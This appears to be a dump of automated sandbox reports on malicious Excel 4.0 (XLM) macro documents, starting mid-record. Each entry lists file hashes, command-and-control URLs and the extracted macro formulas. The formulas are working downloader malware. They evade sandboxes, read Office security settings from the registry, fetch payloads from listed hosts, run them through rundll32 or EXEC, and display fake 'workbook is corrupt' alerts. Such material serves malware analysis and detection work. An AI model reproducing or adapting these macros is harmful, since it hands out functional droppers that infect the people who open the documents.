corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k2PXnzpxoi\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c0ff6b750a7018a7ad7f9daebed1878bba409bb8f72e779260d53af0c5a40f1"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c0ff6b750a7018a7ad7f9daebed1878bba409bb8f72e779260d53af0c5a40f1","filesize":167424,"md5":"138050288445f08c7ab3e7e56f64cd1c","sha1":"30b0c4f673887278ec434b77d786fe339fea1425","sha256":"7c0ff6b750a7018a7ad7f9daebed1878bba409bb8f72e779260d53af0c5a40f1","sha512":"0a236afa3f67f37d1113ff9a068a6d2cb3cf18cfe0c689f5b38cc67f406c8728bfca02fd5ce995d28bcde577f5374f8d32766900fa6fb7ab00c928a67353dc81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c0ff6b750a7018a7ad7f9daebed1878bba409bb8f72e779260d53af0c5a40f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"r8lSjxkVNs\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c276689e6f89762aeca86a9c1f5f7d4c00e94c8518ed7969850b94595a5966d"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c276689e6f89762aeca86a9c1f5f7d4c00e94c8518ed7969850b94595a5966d","filesize":209920,"md5":"b0b4b1ccbf42812ff9857dbe3bd84ec9","sha1":"2ecd5b7e05763459b7019e083d5175aff05b45f5","sha256":"7c276689e6f89762aeca86a9c1f5f7d4c00e94c8518ed7969850b94595a5966d","sha512":"33ce49261e52639f537a64df4c1c8d71003c6d5fdde694ea369aa226fc8efd659ff14326a08fcec47e0f1f1298b298c1235a84488137d27ea76da86a2ad584f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c276689e6f89762aeca86a9c1f5f7d4c00e94c8518ed7969850b94595a5966d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UGu507caJE\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c2f9c0941f52e52272d45b70f46389413ce985e7873e755c70600205db9d0e7"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c2f9c0941f52e52272d45b70f46389413ce985e7873e755c70600205db9d0e7","filesize":144896,"md5":"0fa18d8e01092553bdafc7fd08ccbaf7","sha1":"0292071422cbbfdf6979990deaa7623e6362d7dd","sha256":"7c2f9c0941f52e52272d45b70f46389413ce985e7873e755c70600205db9d0e7","sha512":"687e9ef41af0518d9ec6bdc8e8b8131f27c1ab31a51ab9c062a3604dce5d2b387919f806d46ac3ff3bc1824aef7807e799c633f50d1f3eb9c422a1cdadec41e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c2f9c0941f52e52272d45b70f46389413ce985e7873e755c70600205db9d0e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c303d7090ea92475079dd3eab086f4d772274cb63bcfedd4e3d01b9b7dd3840"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c303d7090ea92475079dd3eab086f4d772274cb63bcfedd4e3d01b9b7dd3840","filesize":209920,"md5":"8dc689ae92b90a1b188bba5d52d6fe61","sha1":"e97606c6ae18ef0afe5453e1ed6be29f8b35d451","sha256":"7c303d7090ea92475079dd3eab086f4d772274cb63bcfedd4e3d01b9b7dd3840","sha512":"cb56fca4921188fc3c7515b2bc72a99519a8386e8ec7ebc5b7f766c91db4f800ba10a43537295c016fb94fdbda6bb680817f5cee6ff45217f6a6380022dae85f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c303d7090ea92475079dd3eab086f4d772274cb63bcfedd4e3d01b9b7dd3840.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"X7GHth5RH2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c35c3de956dd68ff6ff7b330aa840f4647df1fbc4f24354c37c3196cf372d7a"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c35c3de956dd68ff6ff7b330aa840f4647df1fbc4f24354c37c3196cf372d7a","filesize":185344,"md5":"3d5def5d29b4771316524bc46c6459d0","sha1":"bb27606857e530f3c90e45fe8a7c09dc7d8b365b","sha256":"7c35c3de956dd68ff6ff7b330aa840f4647df1fbc4f24354c37c3196cf372d7a","sha512":"b9a90ed52e2d2968b047618b8f7d7f53ecd37006a42340e976e343b78a93464e00c93403dc4a446cbd20abc6868e434ae79e2ddc91917dbe068fe2d503fa2b5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c35c3de956dd68ff6ff7b330aa840f4647df1fbc4f24354c37c3196cf372d7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c3afaefef0d05546eacab0c4f25d60b0c9ed3ef61209119b58dffc4afe770c7"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c3afaefef0d05546eacab0c4f25d60b0c9ed3ef61209119b58dffc4afe770c7","filesize":167424,"md5":"7654a0050950535164acd99f80fd1887","sha1":"b36719d84397ab8f406bd47b06b05ece25a91c44","sha256":"7c3afaefef0d05546eacab0c4f25d60b0c9ed3ef61209119b58dffc4afe770c7","sha512":"bc27f1aa8c2bcccffd3e4f756afa709c9cf2a322a8a1d11899cb7bcc48e3344787c3f49f7ebec705199a3f035a52e42f3070471638d9400f05ad4df1fc61c179","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c3afaefef0d05546eacab0c4f25d60b0c9ed3ef61209119b58dffc4afe770c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ItOql27Ine\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c5fb69a43a6102b1b86eef27f2e17b3922b8cb677703783574a9c6cfbbd10c3"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c5fb69a43a6102b1b86eef27f2e17b3922b8cb677703783574a9c6cfbbd10c3","filesize":103941,"md5":"97456959547b6a1597de93a9b7cbb11c","sha1":"04986db1c4fcd05a9932ce3fa6b339368e5d36d8","sha256":"7c5fb69a43a6102b1b86eef27f2e17b3922b8cb677703783574a9c6cfbbd10c3","sha512":"4c4ff8a323170070ea1ac26ab7bc7f69cc6355ac635e6c68791a65df27b1dfcb060dcf1290b52abc60d926f18e784f7419c0093a9082ffa6494859c412fbfb0c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c5fb69a43a6102b1b86eef27f2e17b3922b8cb677703783574a9c6cfbbd10c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c66196d0cc4179cbb11f29ca4b6c09c08ba596db6e36c8186d9f2ec94c2cee4"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c66196d0cc4179cbb11f29ca4b6c09c08ba596db6e36c8186d9f2ec94c2cee4","filesize":152576,"md5":"7e66cbf23ff62ebd52c878d129b987ea","sha1":"46858ac4b6ebf3cf06b192bb24a2a66601239597","sha256":"7c66196d0cc4179cbb11f29ca4b6c09c08ba596db6e36c8186d9f2ec94c2cee4","sha512":"18b3702846d6bb508da9d9d7c71a53fa84a55c988922aee259e638d4b7e90f2b61ed258ca929b1b99fd4880b000a94e63c06a93ffdd89735d8a8b54ff0079329","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c66196d0cc4179cbb11f29ca4b6c09c08ba596db6e36c8186d9f2ec94c2cee4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xmTPkXOt6Y\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c682da7e0e5cbfac3203ece8c250a4d56ab83f9b02fbed50a4c1091cb441a50"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c682da7e0e5cbfac3203ece8c250a4d56ab83f9b02fbed50a4c1091cb441a50","filesize":113664,"md5":"902a3d64a5877e890ddb5a77045d1c40","sha1":"511735d7967a4f971833e415ae8e81d8124f3134","sha256":"7c682da7e0e5cbfac3203ece8c250a4d56ab83f9b02fbed50a4c1091cb441a50","sha512":"48f34511fc361b89f0b5f8cecbcf35f545edc4245300e4ed3fcf22dd6f7fcd6a89b3231a981cb6ab6900d43a0943c4e0e3a6c558203bc661470fb3f70b9c18d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c682da7e0e5cbfac3203ece8c250a4d56ab83f9b02fbed50a4c1091cb441a50.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"Z9FcE2ajaE\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c6ceec102b0830992f62334322284f05b2af66a52238febe5197a235ab4d3fe"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c6ceec102b0830992f62334322284f05b2af66a52238febe5197a235ab4d3fe","filesize":152576,"md5":"f60ce8a346ba90fa0b9e2b25293452ea","sha1":"8d40c8b90c6313d0c2d1225b2e2cc8adb4ae4fbb","sha256":"7c6ceec102b0830992f62334322284f05b2af66a52238febe5197a235ab4d3fe","sha512":"468d8ddf5ac4a7a4e064cf9c3dd516cbd0130bda6476b14a49671ee1bad7bf6a51999a711d2dd145a7d15ed9cc5daecfebb527b4a50bcd1d8321908035073c47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c6ceec102b0830992f62334322284f05b2af66a52238febe5197a235ab4d3fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gyAWZ7w5u3\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7c8073c1511e00ff306126e75936ccd3357a5e82a46facc37e6f638d25fe1994"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7c8073c1511e00ff306126e75936ccd3357a5e82a46facc37e6f638d25fe1994","filesize":209920,"md5":"e8fc3c352ee99617c0807f779f241af5","sha1":"a14dce070288eb5cd76d64ab3373850d605a5302","sha256":"7c8073c1511e00ff306126e75936ccd3357a5e82a46facc37e6f638d25fe1994","sha512":"fd89ba914140482251042a19db6e1e8a054dd111f9093f756627df4762d7b92b85d4fef6262b9bc20b70b4e737f60bcbdda7bc4aee6ab1f58601d5e0f30a738a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7c8073c1511e00ff306126e75936ccd3357a5e82a46facc37e6f638d25fe1994.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"n2Z643SEA2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7cbf6ca6c024e352330807ecb8ece47895e043f63535778a2dfc26ae5cfec552"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7cbf6ca6c024e352330807ecb8ece47895e043f63535778a2dfc26ae5cfec552","filesize":168448,"md5":"9773d637a273566fca5b70c186170c95","sha1":"9e88dda50e490b0dcc0d418ebe263e510268efbd","sha256":"7cbf6ca6c024e352330807ecb8ece47895e043f63535778a2dfc26ae5cfec552","sha512":"cb65aab5483b58e106ba8682424603f01a52758444908ae95159a1ee30642f63e02ea49c3bec28ecc05ace065c85b23187ff0354430c0de7cd26e86279088cbb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7cbf6ca6c024e352330807ecb8ece47895e043f63535778a2dfc26ae5cfec552.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AOT5H0923h\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ce0674185ebc1a56301fbcf83e825411343f17365393c9603af3dca4cfdca37"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7ce0674185ebc1a56301fbcf83e825411343f17365393c9603af3dca4cfdca37","filesize":185344,"md5":"0222212a387f5b3786c8f9413d2bee37","sha1":"3fb338e2e3db63c0e3fe5cde3942cdadbab49a77","sha256":"7ce0674185ebc1a56301fbcf83e825411343f17365393c9603af3dca4cfdca37","sha512":"d4434eecfabe58661d02cc583111139261aece897cea6a8f84731dd60c699ef1ab51c9da381f56dd04717b973e1ccfa27e9300fcce9bc03dd75b30e6824bf7c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ce0674185ebc1a56301fbcf83e825411343f17365393c9603af3dca4cfdca37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7ce0be4a0fe520fb408de1d85fd59693965b982f3d7972975f2e3b1d48300270"},"analysis":{"reported":"2020-04-09T16:17:15Z","score":10},"files":[{"filename":"7ce0be4a0fe520fb408de1d85fd59693965b982f3d7972975f2e3b1d48300270","filesize":209920,"md5":"64d5281c49bcde97efbdebebed1bb96a","sha1":"561c274dceccfd08ed43bda09fcb46c0a54d6d59","sha256":"7ce0be4a0fe520fb408de1d85fd59693965b982f3d7972975f2e3b1d48300270","sha512":"ac1a5ed1f7b4b9c22e10da7e9bbdbb1e0c5014d1665a181b0aaec622070074a3d66bdbdd0b40fa7830df804ea6f024f32f7d0c5c5af023475cfdfadaf6e12425","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7ce0be4a0fe520fb408de1d85fd59693965b982f3d7972975f2e3b1d48300270.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"96ClR16H0d\",TRUE)\nGOTO(R$0C$16)"}}}]}
